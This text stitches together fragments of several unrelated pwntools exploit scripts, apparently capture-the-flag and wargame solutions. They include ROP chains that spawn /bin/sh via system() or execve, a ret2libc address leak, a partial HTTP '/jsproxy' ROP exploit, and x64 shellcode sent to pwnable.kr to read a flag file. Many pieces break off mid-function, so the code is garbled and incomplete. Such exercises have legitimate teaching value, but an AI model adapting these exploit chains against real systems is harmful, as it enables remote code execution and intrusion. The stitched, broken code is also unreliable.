m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
if not m:
raise RuntimeError("Wrong password request")
byte = int(m.group(1), 16)
r.send(''.join(chr(ord(c) ^ byte) for c in pwd2).encode('hex') + '\n')
if not r.recvline() == 'Password ok!\n':
raise RuntimeError("Can't load dictionary")
if not r.recvline() == 'Dictionary loaded\n':
raise RuntimeError("Can't load dictionary")
r.send("translate {}\n".format(str_to_translate))
if not r.recvline().strip() == str_after_translate_2:
raise RuntimeError("Wrong translation after loading stored dictionary")
r.send("quit\n")
if not r.recvall() == "Good bye!\n":
raise RuntimeError("Wrong goodbye")
import pwn
pwn.context(os='linux', arch='i386', word_size=32)
import re
import struct
cache = {}
pat = re.compile('\$\+[-]?0x[0-9a-f]+')
pat2 = re.compile('[ ]*push [0-9]+[ ]*')
pat3 = re.compile('[ ]*mov eax, (d)?word ptr \[0x[0-9a-f]+\][ ]*')
pat4 = re.compile(
'[ ]*mov eax, (dword ptr )?\[(?P<register>e[a-z][a-z])( )?[+-]( )?(0x)?[0-9a-f]+\][ ]*'
)
pat5 = re.compile('(0x[0-9a-f]+|[0-9]+)')
pat6 = re.compile(
'[ ]*(?P<mnemonic>(add)|(sub)) (?P<register>(esp)|(ebx)),(?P<amount>[0-9]*)[ ]*'
)
pat7 = re.compile('[ ]*mov eax, word ptr.*') #Match stupid size mismatch
pat8 = re.compile('[ ]*mov eax, .[xip]') #Match ridiculous register mismatch
#jcxz and jecxz are removed because they don't have a large expansion
JCC = [
'jo', 'jno', 'js', 'jns', 'je', 'jz', 'jne', 'jnz', 'jb', 'jnae', 'jc',
'jnb', 'jae', 'jnc', 'jbe', 'jna', 'ja', 'jnbe', 'jl', 'jnge', 'jge',
'jnl', 'jle', 'jng', 'jg', 'jnle', 'jp', 'jpe', 'jnp', 'jpo'
]
#Simple cache code. Called after more complex preprocessing of assembly source.
def _asm(text):
if text in cache:
return cache[text]
popebpret = 0x0804873b
# data addresses
data = 0x08049000
rop_buffer = data + 0x400
# PLT entries (jump to here)
gets_plt = 0x8048420
printf_plt = 0x8048410
puts_plt = 0x8048450
# GOT entries
printf_got = 0x8049a2c
# set up pwnlib so that it behaves nicely for us
pwn.context(terminal=['tmux', 'splitw', '-l', '45'])
# custom breakpoint
breakpoints = [
#ropnop,
#popebpret,
]
def get_shell(t):
# we need these things
fn = 0x11111111
envp = 0x22222222
argv = 0x33333333
int0x80 = 0x44444444
import pwn
import sys
# Setup enviroment
process = pwn.process("./write4")
pwn.context(os="linux", arch="amd64")
elf = pwn.ELF("write4")
# Get cmd and pad
cmd = "/bin/sh" if len(sys.argv) == 1 else sys.argv[1]
cmd = cmd + 8 * "\x00" if len(
cmd) % 8 == 0 else cmd + (8 - (len(cmd) % 8)) * "\x00"
# Generate rop
rop = pwn.ROP(elf)
for i in range(0, len(cmd), 8):
rop.raw(rop.find_gadget(["pop r14", "pop r15", "ret"]))
rop.raw(elf.bss() + i)
rop.raw(cmd[i:i + 8])
pwn.log.info("Found gadget mov? " + str(rop.find_gadget(["mov r14, r15"])))
rop.raw(elf.symbols["usefulGadgets"]) # mov r14, r15
rop.system(elf.bss())
pwn.log.info(rop.dump())
# Execute command
process.readline()
process.readline()
process.readline()
process.readline()
payload = "A" * 40 + rop.chain()
process.sendline(payload)
#!/usr/bin/env python3
from pwn import ELF, process, context, log
from fastpwn import pack, aslr # custom library :)
from sys import argv, exit
try:
if len(argv) > 1 and argv[1] == "-l":
if aslr.read():
aslr.write("2")
context(arch='amd64', os='linux', log_level='DEBUG') # binary context
binary = ELF("./lab") # define our binary
p = binary.process(env={'LD_PRELOAD': './libc.so.6'
}) # start our process and define enviroment
libc = binary.libc # name our libc object
# we can statically find the addresses of the PLT and GOT within the binary
# just in case you were too lazy to, here is the pwntools way to do it
#
# plt_puts=binary.plt['puts']
# got_puts=binary.got['puts']
# main_addr=binary.sym['main']
pop_rdi = pack.pk64(0x00000000004011e3)
got_puts = pack.pk64(0x00404018)
plt_puts = pack.pk64(0x00401030)
main_addr = pack.pk64(0x00401136)
offset = 40
leak_payload = b"A" * offset # overwrite ret addr, main ret back to gadget
leak_payload += pop_rdi # next we use a gadget, rdi will be the first parameter
leak_payload += got_puts # pass the address of the puts() entry on the global offset table
leak_payload += plt_puts # then, call puts(), this will actuall call puts
leak_payload += main_addr # ret back to main, since we still want to overwrite the buffer again
from struct import pack
import pwn
pwn.context(arch='i386', os='linux', log_level='debug')
p = ''
p += pack('<I', 0x00001aa6) # pop edx ; ret
p += pack('<I', 0x001b0040) # @ .data
p += pack('<I', 0x00023f97) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0006b34b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x00001aa6) # pop edx ; ret
p += pack('<I', 0x001b0044) # @ .data + 4
p += pack('<I', 0x00023f97) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0006b34b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x00001aa6) # pop edx ; ret
p += pack('<I', 0x001b0048) # @ .data + 8
p += pack('<I', 0x0002c5fc) # xor eax, eax ; ret
p += pack('<I', 0x0006b34b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x00018395) # pop ebx ; ret
p += pack('<I', 0x001b0040) # @ .data
p += pack('<I', 0x000b4047) # pop ecx ; ret
p += pack('<I', 0x001b0048) # @ .data + 8
p += pack('<I', 0x00001aa6) # pop edx ; ret
p += pack('<I', 0x001b0048) # @ .data + 8
p += pack('<I', 0x0002c5fc) # xor eax, eax ; ret
p += pack('<I', 0x00007eec) # inc eax ; ret
p += pack('<I', 0x00007eec) # inc eax ; ret
p += pack('<I', 0x00007eec) # inc eax ; ret
p += pack('<I', 0x00007eec) # inc eax ; ret
ELF,
)
from pwn import * # noqa
import ropgadget
AST_STACKSIZE = 0x20000 # stack size per thread (128 KB)
SKIP_SPACE = 0x1000 # 4 KB of "safe" space for the stack of thread 2
ROP_SPACE = 0x8000 # we can send 32 KB of ROP chain!
# alloca align memory with "content-length + 0x10 & 0xF" so we need to take it into account
ALIGN_SIZE = 0x10
# we need to overwrite a return address to start the ROP chain
ADDRESS_SIZE = 0x4
context(arch="i386", os="linux", log_level="WARNING")
gadgets = dict()
plt = dict()
strings = dict()
system_chunks = []
cmd_chunks = []
def makeHeader(num):
return bytes("POST /jsproxy HTTP/1.1\r\nContent-Length: ") + bytes(str(num)) + bytes("\r\n\r\n")
def makeSocket(ip, port):
s = socket.socket()
try:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfinit
import os
import time
import pwn
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('mr_snowy')
pwn.context(terminal=['tmux', 'new-window'])
pwn.context.log_level = 'DEBUG'
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
host = pwn.args.HOST or '138.68.183.216'
port = int(pwn.args.PORT or 30766)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return pwn.process([exe.path] + argv, *a, **kw)
def main():
pwn.context(arch='amd64', os='linux')
mssh = pwn.ssh(host='pwnable.kr', user='******', password='******', port=2222)
attack = mssh.connect_remote('0.0.0.0', 9026)
shellcode = pwn.asm("mov rax, 0x101010101010101")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x101010101010101 ^ 0x676e6f306f306f")
shellcode += pwn.asm("xor [rsp], rax")
shellcode += pwn.asm("mov rax, 0x306f306f306f306f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x3030303030303030")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x303030306f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f3030303030")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x3030303030303030")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x3030303030303030")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x303030306f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6f6f6f6f6f6f6f6f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6c5f797265765f73")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x695f656d616e5f65")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x6c69665f6568745f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x7972726f732e656c")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x69665f736968745f")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x646165725f657361")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x656c705f656c6966")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x5f67616c665f726b")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x2e656c62616e7770")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rax, 0x5f73695f73696874")
shellcode += pwn.asm("push rax")
shellcode += pwn.asm("mov rdi, rsp")
shellcode += pwn.asm("xor edx, edx")
shellcode += pwn.asm("xor esi, esi")
shellcode += pwn.asm("push SYS_open")
shellcode += pwn.asm("pop rax")
shellcode += pwn.asm("syscall")
shellcode += pwn.asm("mov rdi, rax")
shellcode += pwn.asm("xor eax, eax")
shellcode += pwn.asm("xor edx, edx")
shellcode += pwn.asm("mov dh, 0x400 >> 8")
shellcode += pwn.asm("mov rsi, rsp")
shellcode += pwn.asm("syscall")
shellcode += pwn.asm("push 1")
shellcode += pwn.asm("pop rdi")
shellcode += pwn.asm("xor edx, edx")
shellcode += pwn.asm("mov dh, 0x400 >> 8")
shellcode += pwn.asm("mov rsi, rsp")
shellcode += pwn.asm("push SYS_write")
shellcode += pwn.asm("pop rax")
shellcode += pwn.asm("syscall")
attack.recvuntil('give me your x64 shellcode: ')
attack.send(shellcode)
print attack.recvall()